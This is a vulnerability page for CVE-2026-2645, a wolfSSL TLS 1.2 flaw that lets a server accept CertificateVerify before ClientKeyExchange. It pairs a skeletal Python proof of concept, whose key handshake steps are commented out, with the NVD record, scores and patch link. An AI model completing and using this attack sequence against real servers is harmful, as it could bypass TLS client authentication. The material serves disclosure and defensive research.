CVE-2026-2645

import socket import struct # Conceptual PoC for CVE-2026-2645 # This script demonstrates sending a TLS 1.2 handshake where # CertificateVerify is sent before ClientKeyExchange. def create_tls_record(content_type, version, data): header = struct.pack('!BBH', content_type, version[0], version[1]) return header + struct.pack('!H', len(data)) + data def build_handshake(msg_type, data): return struct.pack('!B', msg_type) + struct.pack('!I', len(data))[1:] + data def exploit(target_ip, target_port): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) # 1. Send ClientHello # ... (Omitted standard ClientHello construction for brevity) ... # client_hello = ... # s.send(create_tls_record(22, (0x03, 0x03), client_hello)) # 2. Receive ServerHello, Certificate, ServerHelloDone # response = s.recv(4096) # 3. Send Client Certificate (if requested) # 4. VULNERABILITY: Send CertificateVerify WITHOUT sending ClientKeyExchange # Normally, the state machine should reject this. # In vulnerable wolfSSL versions, this is accepted. # cert_verify_data = build_handshake(15, b'...') # s.send(create_tls_record(22, (0x03, 0x03), cert_verify_data)) print("[+] PoC logic: Sending CertificateVerify before ClientKeyExchange") print("[+] Check server response to see if handshake continues or fails unexpectedly") s.close() # exploit("127.0.0.1", 443)

{"cve": {"id": "CVE-2026-2645", "sourceIdentifier": "[email protected]", "published": "2026-03-19T18:16:22.043", "lastModified": "2026-04-29T18:47:49.063", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In wolfSSL 5.8.2 and earlier, a logic flaw existed in the TLS 1.2 server state machine implementation. The server could incorrectly accept the CertificateVerify message before the ClientKeyExchange message had been received. This issue affects wolfSSL before 5.8.4 (wolfSSL 5.8.2 and earlier is vulnerable, 5.8.4 is not vulnerable). In 5.8.4 wolfSSL would detect the issue later in the handshake. 5.9.0 was further hardened to catch the issue earlier in the handshake."}, {"lang": "es", "value": "En wolfSSL 5.8.2 y versiones anteriores, existía una falla lógica en la implementación de la máquina de estados del servidor TLS 1.2. El servidor podría aceptar incorrectamente el mensaje CertificateVerify antes de que se hubiera recibido el mensaje ClientKeyExchange. Este problema afecta a wolfSSL anterior a 5.8.4 (wolfSSL 5.8.2 y versiones anteriores son vulnerables, 5.8.4 no es vulnerable). En 5.8.4, wolfSSL detectaría el problema más tarde en el handshake. 5.9.0 fue endurecido aún más para detectar el problema antes en el handshake."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-358"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wolfssl:wolfssl:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.8.4", "matchCriteriaId": "8382D04F-D02F-41EC-8A17-6D6FA9FFA176"}]}]}], "references": [{"url": "https://github.com/wolfSSL/wolfssl/pull/9694", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}